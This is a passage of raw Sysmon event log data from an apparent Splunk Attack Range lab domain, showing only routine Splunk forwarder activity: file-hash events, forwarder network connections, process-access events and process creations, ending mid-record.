Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D19D692B24AF543CD344F1EC22C9285E,SHA256=D0C3F76186D9BCEB61CFF84C4145870AC7F6914F2E6403CC5C7EBA1A015B7847,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104256Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:52.496{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49145CBC9A3315BD36A9D0EE7EC724D2,SHA256=F2622F272F52FFAB3309B234A67D09263B23999E17419521EDDFE1372ED00867,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082155Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:52.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB0A51570B445AAA6958A6F749CC15A1,SHA256=260925B4611E4662CA41EC7F0105AA709D2F4021D983583D41DCC9F25331EEB6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082156Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:53.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42A10B63CAEC97BC95CAD51F0334F3E1,SHA256=B416B5B8DF57913B95E77F579AD5D32B324C44362F049B74132D218681F98DF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104257Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:53.512{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A53D0EB756C0FC3E08C7F4AFB0938BC0,SHA256=9C329821A4116A2FDD7E363760D3C4D44D77B72E76428A7A443D0C6BB1DB9082,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082157Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:54.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B6CC516ACEB5536837FBD55A29D5B78A,SHA256=6C8779946A5E42656749AFCA3154CADF30B44021EC26F8FA050D3355D2CFF53C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104258Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:54.512{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5C6B9C58EDA06929F77F7C089CF0B0C,SHA256=3A4A3294229CEEE200E1BE0884595BD6C27FFEF8876E0F7A549009BBC75406AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104259Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:55.512{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F811B8E84E2C1289132C0C7E78D4ECE,SHA256=5DB25F624596A68D78BE32F64BE857B5A666E8E3ACB7E39F46D9328B0747C467,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082159Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:55.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A15EA57D82B1E24A787FB74047926839,SHA256=3301A8EAF46A42882E26671E61B4C19D78B6B4061A35476491E4497F09E2F1CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082158Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:53.754{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50078-false10.0.1.12-8000- 23542300x8000000000000000104262Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:56.891{58E9C193-ACB4-615A-2F00-00000000FC01}1712NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104261Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:56.516{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE3E823F0FDED5DBA675A478EEB53E8B,SHA256=467059A667C9368E213AB404D16C9FCA2F43F43E0A2BBE5388EBBB5550B09E43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082160Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:56.642{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9481AA36AAC5AE0A98E78BDBD40B69,SHA256=6422626A17026D5E87865FD4C4317D19815295A456B569C888B85D4A3C2624CC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104260Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:54.392{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49587-false10.0.1.12-8000- 23542300x800000000000000082161Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:57.642{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=262ECE8035AE2C6452FE72D54B5F1B6F,SHA256=2E3945EFB72BA11F7AC264DC6B86E75BC3DFB6CBABC9E55369AB7279C81DD1BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104263Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:57.516{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FBB27D650973D6BF380AAB0947DC0C,SHA256=0249254D94A9582F05B27CCB29DCCBB172D294697BCE9E815C6ACA7C956BCD8C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082162Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:58.642{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42A91D184FB12D9AE0BE0D97FD16581D,SHA256=8FC27603670D80230FAFD608F9ECF657AB4C77FC618A256DA842292ACEAB5296,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104272Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.578{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B352-615A-E901-00000000FC01}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104271Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.578{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104270Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.578{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104269Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.578{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104268Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.578{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104267Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.578{58E9C193-ACA4-615A-0500-00000000FC01}412964C:\Windows\system32\csrss.exe{58E9C193-B352-615A-E901-00000000FC01}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104266Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.578{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B352-615A-E901-00000000FC01}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104265Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.579{58E9C193-B352-615A-E901-00000000FC01}2836C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104264Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:58.547{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=317CD1326781C8EDA331FC6162F234EE,SHA256=BC15ACC38659D2E942BDA6F01EE5224F08D7DAD94B419072D9EBE48A6F06A4E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104284Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.562{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B353-615A-EA01-00000000FC01}3388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104283Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.562{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104282Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.562{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104281Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.562{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104280Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.562{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104279Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.562{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B353-615A-EA01-00000000FC01}3388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104278Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.562{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B353-615A-EA01-00000000FC01}3388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104277Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.564{58E9C193-B353-615A-EA01-00000000FC01}3388C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000104276Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:59.547{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F175D1C4A67CAD602ADAFEBD357E67F,SHA256=9E915E52D6800F41ECD5D123168985A3937E54F56D9B842B2E7054D272F251F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082176Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.642{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C38B00EBA9F787B55F9F88A6D4D44D11,SHA256=AD5D6748F95C762322F017508C1B15BA5D8D639D9E8F07E131353DE56F6C9757,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082175Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:59.001{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B353-615A-6401-00000000FD01}3644C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082174Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 